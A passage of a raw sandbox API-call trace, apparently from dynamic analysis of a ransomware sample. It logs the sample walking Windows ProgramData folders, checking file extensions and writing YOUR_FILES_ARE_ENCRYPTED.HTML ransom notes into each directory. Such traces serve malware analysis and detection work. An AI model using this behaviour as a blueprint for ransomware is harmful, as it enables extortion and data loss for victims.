param_2="%02X" | out: param_1="77") returned 2 [0109.682] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="21") returned 2 [0109.682] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="EA") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="0F") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="C2") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="48") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="83") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="CB") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="9A") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="CC") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="6F") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="D8") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="0F") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="EB") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="94") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="82") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="10") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="DC") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="43") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="90") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="E3") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="88") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="61") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="A5") returned 2 [0109.683] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="69") returned 2 [0109.684] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" [0109.684] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0109.684] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0109.684] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9102ec79, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x9112a88a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x349, dwReserved0=0x63372c, dwReserved1=0x6336f0, cFileName="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", cAlternateFileName="UPDATE~1.XML")) returned 0 [0109.684] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0109.684] wnsprintfW (in: pszDest=0x6994a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0109.684] GetProcessHeap () returned 0x600000 [0109.684] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.685] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\USOPrivate\\UpdateStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\usoprivate\\updatestore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.686] WriteFile (in: hFile=0x314, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.686] CloseHandle (hObject=0x314) returned 1 [0109.687] GetProcessHeap () returned 0x600000 [0109.687] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.687] GetProcessHeap () returned 0x600000 [0109.687] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6994a0 | out: hHeap=0x600000) returned 1 [0109.688] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9112cfd3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x9112cfd3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="UpdateStore", cAlternateFileName="UPDATE~1")) returned 0 [0109.688] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.688] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOPrivate\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0109.688] GetProcessHeap () returned 0x600000 [0109.688] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b47b0 [0109.689] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\USOPrivate\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\usoprivate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0109.689] WriteFile (in: hFile=0x300, lpBuffer=0x6b47b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x6b47b0*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0109.691] CloseHandle (hObject=0x300) returned 1 [0109.691] GetProcessHeap () returned 0x600000 [0109.691] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0109.691] GetProcessHeap () returned 0x600000 [0109.691] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.692] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 1 [0109.692] StrStrIW (lpFirst="USOShared", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.692] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared") returned 28 [0109.692] GetProcessHeap () returned 0x600000 [0109.692] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0109.693] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\USOShared" | out: lpString1="\\\\?\\C:\\ProgramData\\USOShared") returned="\\\\?\\C:\\ProgramData\\USOShared" [0109.693] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\USOShared", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\USOShared\\*") returned="\\\\?\\C:\\ProgramData\\USOShared\\*" [0109.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\USOShared\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0109.693] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0109.693] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5a5036cd, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Logs", cAlternateFileName="")) returned 1 [0109.693] StrStrIW (lpFirst="Logs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.693] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs") returned 33 [0109.693] GetProcessHeap () returned 0x600000 [0109.693] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0109.694] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\USOShared\\Logs" | out: lpString1="\\\\?\\C:\\ProgramData\\USOShared\\Logs") returned="\\\\?\\C:\\ProgramData\\USOShared\\Logs" [0109.694] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\USOShared\\Logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\*") returned="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\*" [0109.694] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5a5036cd, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.695] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5a5036cd, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="..", cAlternateFileName="")) returned 1 [0109.695] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5a5036cd, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.001.etl", cAlternateFileName="UP2DAF~1.ETL")) returned 1 [0109.695] StrStrIW (lpFirst="UpdateSessionOrchestration.001.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.695] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl") returned 68 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.001.etl") returned=".etl" [0109.695] lstrlenW (lpString=".etl") returned 4 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.001.etl") returned=".etl" [0109.695] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf98df460, ftLastAccessTime.dwHighDateTime=0x1d705ef, ftLastWriteTime.dwLowDateTime=0x22721e58, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.002.etl", cAlternateFileName="UP3884~1.ETL")) returned 1 [0109.695] StrStrIW (lpFirst="UpdateSessionOrchestration.002.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.695] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl") returned 68 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.002.etl") returned=".etl" [0109.695] lstrlenW (lpString=".etl") returned 4 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.002.etl") returned=".etl" [0109.695] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x6fb852ed, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xa05d916a, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.003.etl", cAlternateFileName="UP8247~1.ETL")) returned 1 [0109.695] StrStrIW (lpFirst="UpdateSessionOrchestration.003.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.695] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl") returned 68 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.003.etl") returned=".etl" [0109.695] lstrlenW (lpString=".etl") returned 4 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.003.etl") returned=".etl" [0109.695] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x46a3d34f, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6df6574e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.004.etl", cAlternateFileName="UPD2FC~1.ETL")) returned 1 [0109.695] StrStrIW (lpFirst="UpdateSessionOrchestration.004.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.695] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl") returned 68 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.004.etl") returned=".etl" [0109.695] lstrlenW (lpString=".etl") returned 4 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.004.etl") returned=".etl" [0109.695] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x95f9994e, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x95f9994e, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.005.etl", cAlternateFileName="UPB784~1.ETL")) returned 1 [0109.695] StrStrIW (lpFirst="UpdateSessionOrchestration.005.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.695] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl") returned 68 [0109.695] PathFindExtensionW (pszPath="UpdateSessionOrchestration.005.etl") returned=".etl" [0109.696] lstrlenW (lpString=".etl") returned 4 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.005.etl") returned=".etl" [0109.696] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9ee92c6a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xc6371102, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.006.etl", cAlternateFileName="UP7D55~1.ETL")) returned 1 [0109.696] StrStrIW (lpFirst="UpdateSessionOrchestration.006.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.696] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl") returned 68 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.006.etl") returned=".etl" [0109.696] lstrlenW (lpString=".etl") returned 4 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.006.etl") returned=".etl" [0109.696] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe7e7af85, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe7e7af85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.007.etl", cAlternateFileName="UPDATE~4.ETL")) returned 1 [0109.696] StrStrIW (lpFirst="UpdateSessionOrchestration.007.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.696] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl") returned 68 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.007.etl") returned=".etl" [0109.696] lstrlenW (lpString=".etl") returned 4 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.007.etl") returned=".etl" [0109.696] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x4e8a793e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8a793e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.008.etl", cAlternateFileName="UPDATE~2.ETL")) returned 1 [0109.696] StrStrIW (lpFirst="UpdateSessionOrchestration.008.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.696] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl") returned 68 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.008.etl") returned=".etl" [0109.696] lstrlenW (lpString=".etl") returned 4 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.008.etl") returned=".etl" [0109.696] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x1d9a4c7e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateSessionOrchestration.009.etl", cAlternateFileName="UPDATE~1.ETL")) returned 1 [0109.696] StrStrIW (lpFirst="UpdateSessionOrchestration.009.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.696] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl") returned 68 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.009.etl") returned=".etl" [0109.696] lstrlenW (lpString=".etl") returned 4 [0109.696] PathFindExtensionW (pszPath="UpdateSessionOrchestration.009.etl") returned=".etl" [0109.696] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xa689893c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xac9249a5, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateUx.001.etl", cAlternateFileName="UP654C~1.ETL")) returned 1 [0109.696] StrStrIW (lpFirst="UpdateUx.001.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.696] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateUx.001.etl") returned 50 [0109.696] PathFindExtensionW (pszPath="UpdateUx.001.etl") returned=".etl" [0109.696] lstrlenW (lpString=".etl") returned 4 [0109.696] PathFindExtensionW (pszPath="UpdateUx.001.etl") returned=".etl" [0109.696] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe7b0d97d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xa690be1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateUx.002.etl", cAlternateFileName="UPDATE~3.ETL")) returned 1 [0109.697] StrStrIW (lpFirst="UpdateUx.002.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.697] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\UpdateUx.002.etl") returned 50 [0109.697] PathFindExtensionW (pszPath="UpdateUx.002.etl") returned=".etl" [0109.697] lstrlenW (lpString=".etl") returned 4 [0109.697] PathFindExtensionW (pszPath="UpdateUx.002.etl") returned=".etl" [0109.697] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe7b0d97d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xa690be1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x63372a, dwReserved1=0x6336f0, cFileName="UpdateUx.002.etl", cAlternateFileName="UPDATE~3.ETL")) returned 0 [0109.697] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.697] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0109.697] GetProcessHeap () returned 0x600000 [0109.697] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6c47b8 [0109.697] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\USOShared\\Logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\usoshared\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.697] WriteFile (in: hFile=0x314, lpBuffer=0x6c47b8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6c47b8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.698] CloseHandle (hObject=0x314) returned 1 [0109.699] GetProcessHeap () returned 0x600000 [0109.699] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0109.699] GetProcessHeap () returned 0x600000 [0109.699] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0109.699] FindNextFileW (in: hFindFile=0x6265b8, 